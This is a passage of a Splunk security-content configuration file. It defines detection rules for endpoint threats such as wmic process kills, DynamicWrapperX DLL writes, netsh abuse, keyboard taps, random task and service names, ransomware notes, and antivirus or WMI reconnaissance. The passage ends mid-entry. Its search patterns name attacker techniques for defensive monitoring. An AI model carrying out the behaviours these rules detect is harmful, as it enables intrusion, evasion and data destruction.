action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Unknown.
action.escu.creation_date = 2021-05-04
action.escu.modification_date = 2021-05-04
action.escu.confidence = high
action.escu.full_search_name = ESCU - Process Kill Base On File Path - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["XMRig"]
action.risk = 1
action.risk.param._risk_message = A process $process_name$ attempts to kill a process by its file path using command line $process$ on host $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Process Kill Base On File Path - Rule
action.correlationsearch.annotations = {"analytic_story": ["XMRig"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies the use of `wmic.exe` using `delete` to remove an executable path. This is typically run via a batch file during the beginning stages of an adversary setting up for mining on an endpoint.
action.notable.param.rule_title = Process Kill Base On File Path
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` values(Processes.process) as process values(Processes.process_id) as process_id count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_wmic` AND Processes.process="*process*" AND Processes.process="*executablepath*" AND Processes.process="*delete*" by Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `process_kill_base_on_file_path_filter`

[ESCU - Process Writing DynamicWrapperX - Rule]
action.escu = 0
action.escu.enabled = 1
description = DynamicWrapperX is an ActiveX component that can be used in a script to call Windows API functions, but it requires the dynwrapx.dll to be installed and registered. With that, a binary writing dynwrapx.dll to disk and registering it in the registry is highly suspect. Why is it needed? In most malicious instances, it will be written to disk at a non-standard location.
During triage, review parallel processes and pivot on the process_guid. Review the registry for any suspicious modifications meant to load dynwrapx.dll. Identify any suspicious module loads of dynwrapx.dll. This will identify the process that will invoke vbs/wscript/cscript. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1559.001"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = DynamicWrapperX is an ActiveX component that can be used in a script to call Windows API functions, but it requires the dynwrapx.dll to be installed and registered. With that, a binary writing dynwrapx.dll to disk and registering it into the registry is highly suspect. Why is it needed? In most malicious instances, it will be written to disk at a non-standard location. During triage, review parallel processes and pivot on the process_guid. Review the registry for any suspicious modifications meant to load dynwrapx.dll. Identify any suspicious module loads of dynwrapx.dll. This will identify the process that will invoke vbs/wscript/cscript. action.escu.how_to_implement = To successfully implement this search you need to be ingesting information on process that include the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Processes` and `Filesystem` node. In addition, confirm the latest CIM App 4.20 or higher is installed and the latest TA for the endpoint product. action.escu.known_false_positives = False positives should be limited, however it is possible to filter by Processes.process_name and specific processes (ex. wscript.exe). Filter as needed. This may need modification based on EDR telemetry and how it brings in registry data. For example, removal of (Default). 
action.escu.creation_date = 2021-10-05
action.escu.modification_date = 2021-10-05
action.escu.confidence = high
action.escu.full_search_name = ESCU - Process Writing DynamicWrapperX - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Remcos"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Process Writing DynamicWrapperX - Rule
action.correlationsearch.annotations = {"analytic_story": ["Remcos"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1559.001"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes by _time Processes.process_id Processes.process_name Processes.dest Processes.process_guid Processes.user | `drop_dm_object_name(Processes)` | join process_guid [| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Filesystem where Filesystem.file_name="dynwrapx.dll" by _time Filesystem.dest Filesystem.file_create_time Filesystem.file_name Filesystem.file_path Filesystem.process_guid Filesystem.user | `drop_dm_object_name(Filesystem)` | fields _time process_guid file_path file_name file_create_time user dest process_name] | stats count min(_time) as firstTime max(_time) as lastTime by dest process_name process_guid file_name file_path file_create_time user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `process_writing_dynamicwrapperx_filter`

[ESCU - Processes launching netsh - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search looks for processes launching netsh.exe. Netsh is a command-line scripting utility that allows you to, either locally or remotely, display or modify the network configuration of a computer that is currently running. Netsh can be used as a persistence proxy technique to execute a helper DLL when netsh.exe is executed. In this search, we are looking for processes spawned by netsh.exe and executing commands via the command line.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.004", "T1562"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search looks for processes launching netsh.exe. Netsh is a command-line scripting utility that allows you to, either locally or remotely, display or modify the network configuration of a computer that is currently running. Netsh can be used as a persistence proxy technique to execute a helper DLL when netsh.exe is executed. In this search, we are looking for processes spawned by netsh.exe and executing commands via the command line.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Some VPN applications are known to launch netsh.exe. Outside of these instances, it is unusual for an executable to launch netsh.exe and run commands.
action.escu.creation_date = 2021-09-16
action.escu.modification_date = 2021-09-16
action.escu.confidence = high
action.escu.full_search_name = ESCU - Processes launching netsh - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Netsh Abuse", "Disabling Security Tools", "DHS Report TA18-074A", "Azorult", "Volt Typhoon", "Snake Keylogger"]
action.risk = 1
action.risk.param._risk_message = A process $process_name$ has launched netsh with command-line $process$ on $dest$.
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 14}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 14}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Processes launching netsh - Rule
action.correlationsearch.annotations = {"analytic_story": ["Netsh Abuse", "Disabling Security Tools", "DHS Report TA18-074A", "Azorult", "Volt Typhoon", "Snake Keylogger"], "cis20": ["CIS 10"], "confidence": 70, "impact": 20, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.004", "T1562"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count values(Processes.process) AS Processes.process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_netsh` by Processes.parent_process_name Processes.parent_process Processes.original_file_name Processes.process_name Processes.user Processes.dest |`drop_dm_object_name("Processes")` |`security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` |`processes_launching_netsh_filter`

[ESCU - Processes Tapping Keyboard Events - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks for processes on a macOS system that are tapping keyboard events, essentially monitoring all keystrokes made by a user. This is a common technique used by RATs to log keystrokes from a victim, although it can also be used by legitimate processes like Siri to react to human input.
action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This search looks for processes on a macOS system that are tapping keyboard events, essentially monitoring all keystrokes made by a user. This is a common technique used by RATs to log keystrokes from a victim, although it can also be used by legitimate processes like Siri to react to human input.
action.escu.how_to_implement = In order to properly run this search, Splunk needs to ingest data from your osquery deployed agents with the [osx-attacks.conf](https://github.com/facebook/osquery/blob/experimental/packs/osx-attacks.conf#L599) pack enabled. Also the [TA-OSquery](https://github.com/d1vious/TA-osquery) must be deployed across your indexers and universal forwarders in order to have the osquery data populate the Alerts data model.
action.escu.known_false_positives = There might be some false positives, as keyboard event taps are used by processes like Siri and Zoom video chat; for some good examples of processes to exclude please see [this](https://github.com/facebook/osquery/pull/5345#issuecomment-454639161) comment.
action.escu.creation_date = 2019-01-25
action.escu.modification_date = 2019-01-25
action.escu.confidence = high
action.escu.full_search_name = ESCU - Processes Tapping Keyboard Events - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["ColdRoot MacOS RAT"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Processes Tapping Keyboard Events - Rule
action.correlationsearch.annotations = {"analytic_story": ["ColdRoot MacOS RAT"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search looks for processes on a macOS system that are tapping keyboard events, essentially monitoring all keystrokes made by a user. This is a common technique used by RATs to log keystrokes from a victim, although it can also be used by legitimate processes like Siri to react to human input.
action.notable.param.rule_title = Processes Tapping Keyboard Events
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | from datamodel Alerts.Alerts | search app=osquery:results name=pack_osx-attacks_Keyboard_Event_Taps | rename columns.cmdline as cmd, columns.name as process_name, columns.pid as process_id| dedup host,process_name | table host,process_name, cmd, process_id | `processes_tapping_keyboard_events_filter`

[ESCU - Randomly Generated Scheduled Task Name - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following hunting analytic leverages Event ID 4698, `A scheduled task was created`, to identify the creation of a Scheduled Task with a suspicious, high-entropy task name. To achieve this, this analytic also leverages the `ut_shannon` function from the URL ToolBox Splunk application. Red teams and adversaries alike may abuse the Task Scheduler to create and start a remote Scheduled Task and obtain remote code execution. To achieve this goal, tools like Impacket or CrackMapExec typically create a Scheduled Task with a random task name on the victim host. This hunting analytic may help defenders identify Scheduled Tasks created as part of a lateral movement attack. The entropy threshold `ut_shannon > 3` should be customized by users. The Command field can be used to determine if the task has malicious intent or not.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053", "T1053.005"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following hunting analytic leverages Event ID 4698, `A scheduled task was created`, to identify the creation of a Scheduled Task with a suspicious, high-entropy task name. To achieve this, this analytic also leverages the `ut_shannon` function from the URL ToolBox Splunk application. Red teams and adversaries alike may abuse the Task Scheduler to create and start a remote Scheduled Task and obtain remote code execution. To achieve this goal, tools like Impacket or CrackMapExec typically create a Scheduled Task with a random task name on the victim host. This hunting analytic may help defenders identify Scheduled Tasks created as part of a lateral movement attack. The entropy threshold `ut_shannon > 3` should be customized by users. The Command field can be used to determine if the task has malicious intent or not.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Windows Security Event Logs with EventCode 4698 enabled. The Windows TA as well as the URL ToolBox application are also required.
action.escu.known_false_positives = Legitimate applications may use random Scheduled Task names.
action.escu.creation_date = 2021-11-29
action.escu.modification_date = 2021-11-29
action.escu.confidence = high
action.escu.full_search_name = ESCU - Randomly Generated Scheduled Task Name - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Active Directory Lateral Movement", "CISA AA22-257A", "Scheduled Tasks"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Randomly Generated Scheduled Task Name - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement", "CISA AA22-257A", "Scheduled Tasks"], "cis20": ["CIS 10"], "confidence": 50, "impact": 90, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053", "T1053.005"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `wineventlog_security` EventCode=4698 | xmlkv Message | lookup ut_shannon_lookup word as Task_Name | where ut_shannon > 3 | table _time, dest, Task_Name, ut_shannon, Command, Author, Enabled, Hidden | `randomly_generated_scheduled_task_name_filter`

[ESCU - Randomly Generated Windows Service Name - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following hunting analytic leverages Event ID 7045, `A new service was installed in the system`, to identify the installation of a Windows Service with a suspicious, high-entropy service name. To achieve this, this analytic also leverages the `ut_shannon` function from the URL ToolBox Splunk application. Red teams and adversaries alike may abuse the Service Control Manager to create and start a remote Windows Service and obtain remote code execution. To achieve this goal, some tools like Metasploit, Cobalt Strike and Impacket typically create a Windows Service with a random service name on the victim host. This hunting analytic may help defenders identify Windows Services installed as part of a lateral movement attack. The entropy threshold `ut_shannon > 3` should be customized by users. The Service_File_Name field can be used to determine if the Windows Service has malicious intent or not.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1543", "T1543.003"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following hunting analytic leverages Event ID 7045, `A new service was installed in the system`, to identify the installation of a Windows Service with a suspicious, high-entropy service name. To achieve this, this analytic also leverages the `ut_shannon` function from the URL ToolBox Splunk application. Red teams and adversaries alike may abuse the Service Control Manager to create and start a remote Windows Service and obtain remote code execution. To achieve this goal, some tools like Metasploit, Cobalt Strike and Impacket typically create a Windows Service with a random service name on the victim host. This hunting analytic may help defenders identify Windows Services installed as part of a lateral movement attack. The entropy threshold `ut_shannon > 3` should be customized by users. The Service_File_Name field can be used to determine if the Windows Service has malicious intent or not.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the Service Name, Service File Name, Service Start Type, and Service Type from your endpoints. The Windows TA as well as the URL ToolBox application are also required.
action.escu.known_false_positives = Legitimate applications may use random Windows Service names.
action.escu.creation_date = 2021-11-29
action.escu.modification_date = 2021-11-29
action.escu.confidence = high
action.escu.full_search_name = ESCU - Randomly Generated Windows Service Name - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Active Directory Lateral Movement"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Randomly Generated Windows Service Name - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement"], "cis20": ["CIS 10"], "confidence": 50, "impact": 90, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1543", "T1543.003"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `wineventlog_system` EventCode=7045 | lookup ut_shannon_lookup word as Service_Name | where ut_shannon > 3 | table EventCode ComputerName Service_Name ut_shannon Service_Start_Type Service_Type Service_File_Name | `randomly_generated_windows_service_name_filter`

[ESCU - Ransomware Notes bulk creation - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies a large number of ransomware note file creations (file types such as .txt, .html, .hta) on the infected machine. This behavior is a useful indicator when the ransomware note filename is new to the security industry or is not yet in the ransomware lookup table list you use for monitoring.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1486"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies a large number of ransomware note file creations (file types such as .txt, .html, .hta) on the infected machine. This behavior is a useful indicator when the ransomware note filename is new to the security industry or is not yet in the ransomware lookup table list you use for monitoring.
action.escu.how_to_implement = You must be ingesting data that records the filesystem activity from your hosts to populate the Endpoint file-system data model node. If you are using Sysmon, you will need a Splunk Universal Forwarder on each endpoint from which you want to collect data.
action.escu.known_false_positives = Unknown.
action.escu.creation_date = 2021-03-12
action.escu.modification_date = 2021-03-12
action.escu.confidence = high
action.escu.full_search_name = ESCU - Ransomware Notes bulk creation - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Sysmon"]
action.escu.analytic_story = ["Clop Ransomware", "DarkSide Ransomware", "BlackMatter Ransomware", "Chaos Ransomware", "LockBit Ransomware", "Rhysida Ransomware"]
action.risk = 1
action.risk.param._risk_message = High-frequency creation of $file_name$ in different file paths on host $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 81}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Ransomware Notes bulk creation - Rule
action.correlationsearch.annotations = {"analytic_story": ["Clop Ransomware", "DarkSide Ransomware", "BlackMatter Ransomware", "Chaos Ransomware", "LockBit Ransomware", "Rhysida Ransomware"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1486"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `sysmon` EventCode=11 file_name IN ("*\.txt","*\.html","*\.hta") |bin _time span=10s | stats min(_time) as firstTime max(_time) as lastTime dc(TargetFilename) as unique_readme_path_count values(TargetFilename) as list_of_readme_path by Computer Image file_name | rename Computer as dest | where unique_readme_path_count >= 15 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `ransomware_notes_bulk_creation_filter`

[ESCU - Recon AVProduct Through Pwh or WMI - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies suspicious PowerShell script execution via EventCode 4104 performing checks to identify anti-virus products installed on the endpoint. This technique is commonly found in malware and APT events where the adversary will map all running security applications or services. During triage, review parallel processes within the same timeframe. Review the full script block to identify other related artifacts.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Reconnaissance"], "mitre_attack": ["T1592"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies suspicious PowerShell script execution via EventCode 4104 performing checks to identify anti-virus products installed on the endpoint. This technique is commonly found in malware and APT events where the adversary will map all running security applications or services. During triage, review parallel processes within the same timeframe. Review the full script block to identify other related artifacts.
action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.
action.escu.known_false_positives = Network administrators may use this command for checking purposes.
action.escu.creation_date = 2023-04-14
action.escu.modification_date = 2023-04-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Recon AVProduct Through Pwh or WMI - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Qakbot", "Windows Post-Exploitation", "Hermetic Wiper", "Ransomware", "Prestige Ransomware", "Malicious PowerShell", "Data Destruction"]
action.risk = 1
action.risk.param._risk_message = A suspicious PowerShell script contains an AV recon command in $ScriptBlockText$ with EventCode $EventCode$ on host $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Recon AVProduct Through Pwh or WMI - Rule
action.correlationsearch.annotations = {"analytic_story": ["Qakbot", "Windows Post-Exploitation", "Hermetic Wiper", "Ransomware", "Prestige Ransomware", "Malicious PowerShell", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Reconnaissance"], "mitre_attack": ["T1592"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies suspicious PowerShell script execution via EventCode 4104 performing checks to identify anti-virus products installed on the endpoint. This technique is commonly found in malware and APT events where the adversary will map all running security applications or services. During triage, review parallel processes within the same timeframe. Review the full script block to identify other related artifacts.
action.notable.param.rule_title = Recon AVProduct Through Pwh or WMI
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 (ScriptBlockText = "*SELECT*" OR ScriptBlockText = "*WMIC*") AND (ScriptBlockText = "*AntiVirusProduct*" OR ScriptBlockText = "*AntiSpywareProduct*") | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `recon_avproduct_through_pwh_or_wmi_filter`

[ESCU - Recon Using WMI Class - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies suspicious PowerShell via EventCode 4104, where WMI is performing an event query looking for running processes or running services. This technique is commonly found where the adversary will identify services and system information on the compromised machine. During triage, review parallel processes within the same timeframe. Review the full script block to identify other related artifacts.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Reconnaissance", "Installation"], "mitre_attack": ["T1592", "T1059.001"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies suspicious PowerShell via EventCode 4104, where WMI is performing an event query looking for running processes or running services. This technique is commonly found where the adversary will identify services and system information on the compromised machine. During triage, review parallel processes within the same timeframe. Review the full script block to identify other related artifacts.
action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.
action.escu.known_false_positives = Network administrators may use this command for checking purposes.
action.escu.creation_date = 2023-11-07
action.escu.modification_date = 2023-11-07
action.escu.confidence = high
action.escu.full_search_name = ESCU - Recon Using WMI Class - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["AsyncRAT", "Qakbot", "Industroyer2", "Hermetic Wiper", "LockBit Ransomware", "Malicious PowerShell", "Data Destruction"]
action.risk = 1
action.risk.param._risk_message = A suspicious PowerShell script containing host recon commands was detected on host $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 60}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 60}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Recon Using WMI Class - Rule
action.correlationsearch.annotations = {"analytic_story": ["AsyncRAT", "Qakbot", "Industroyer2", "Hermetic Wiper", "LockBit Ransomware", "Malicious PowerShell", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 80, "impact": 75, "kill_chain_phases": ["Reconnaissance", "Installation"], "mitre_attack": ["T1592", "T1059.001"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 (ScriptBlockText= "*SELECT*" OR ScriptBlockText= "*Get-WmiObject*") AND (ScriptBlockText= "*Win32_Bios*" OR ScriptBlockText= "*Win32_OperatingSystem*" OR ScriptBlockText= "*Win32_Processor*" OR ScriptBlockText= "*Win32_ComputerSystem*" OR ScriptBlockText= "*Win32_PnPEntity*" OR ScriptBlockText= "*Win32_ShadowCopy*" OR ScriptBlockText= "*Win32_DiskDrive*" OR ScriptBlockText= "*Win32_PhysicalMemory*") | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest | rename UserID as user| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `recon_using_wmi_class_filter`

[ESCU - Recursive Delete of Directory In Batch CMD - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search detects a suspicious command line designed to delete files or directories recursively using a batch command. This technique was seen in ransomware (reddot), where it tries to delete the files in the recycle bin to impair the user's ability to recover deleted files.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070.004", "T1070"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search detects a suspicious command line designed to delete files or directories recursively using a batch command. This technique was seen in ransomware (reddot), where it tries to delete the files in the recycle bin to impair the user's ability to recover deleted files.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents.
These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = network operator may use this batch command to delete recursively a directory or files within directory action.escu.creation_date = 2022-11-12 action.escu.modification_date = 2022-11-12 action.escu.confidence = high action.escu.full_search_name = ESCU - Recursive Delete of Directory In Batch CMD - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ransomware"] action.risk = 1 action.risk.param._risk_message = Recursive Delete of Directory In Batch CMD by $user$ on $dest$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule 